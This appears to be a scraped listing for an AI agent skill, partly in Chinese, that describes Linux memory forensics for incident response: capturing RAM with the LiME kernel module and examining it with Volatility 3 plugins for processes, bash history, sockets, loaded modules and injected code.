Extracts Linux memory using LiME kernel module and analyzes with Volatility 3 for processes, network connections, bash history, kernel modules, and injected code in incident response.
npx claudepluginhub killvxk/cybersecurity-skills-zhThis skill uses the workspace's default tool permissions.
使用 LiME 内核模块采集 Linux 内存,然后使用 Volatility 3 从内存镜像中提取取证制品。
Acquires Linux memory with LiME kernel module and analyzes with Volatility 3 to extract processes, network connections, bash history, kernel modules, and injected code for incident response.
Acquires Linux memory with LiME kernel module and analyzes dumps using Volatility 3 to extract processes, bash history, network connections, kernel modules, and injected code for incident response.
Uses Volatility 3 to analyze RAM dumps for malware execution, process injection, network connections, and credential theft evidence. For incident response, DFIR, and memory forensics investigations.
Share bugs, ideas, or general feedback.
使用 LiME 内核模块采集 Linux 内存,然后使用 Volatility 3 从内存镜像中提取取证制品。
# LiME 内存采集
insmod lime-$(uname -r).ko "path=/evidence/memory.lime format=lime"
# Volatility 3 分析
vol3 -f /evidence/memory.lime linux.pslist
vol3 -f /evidence/memory.lime linux.bash
vol3 -f /evidence/memory.lime linux.sockstat
import volatility3
from volatility3.framework import contexts, automagic
from volatility3.plugins.linux import pslist, bash, sockstat
# Volatility 3 编程方式使用
context = contexts.Context()
automagics = automagic.available(context)
关键分析步骤:
# 完整取证工作流
vol3 -f memory.lime linux.pslist | grep -v "\[kthread\]"
vol3 -f memory.lime linux.bash
vol3 -f memory.lime linux.malfind
vol3 -f memory.lime linux.lsmod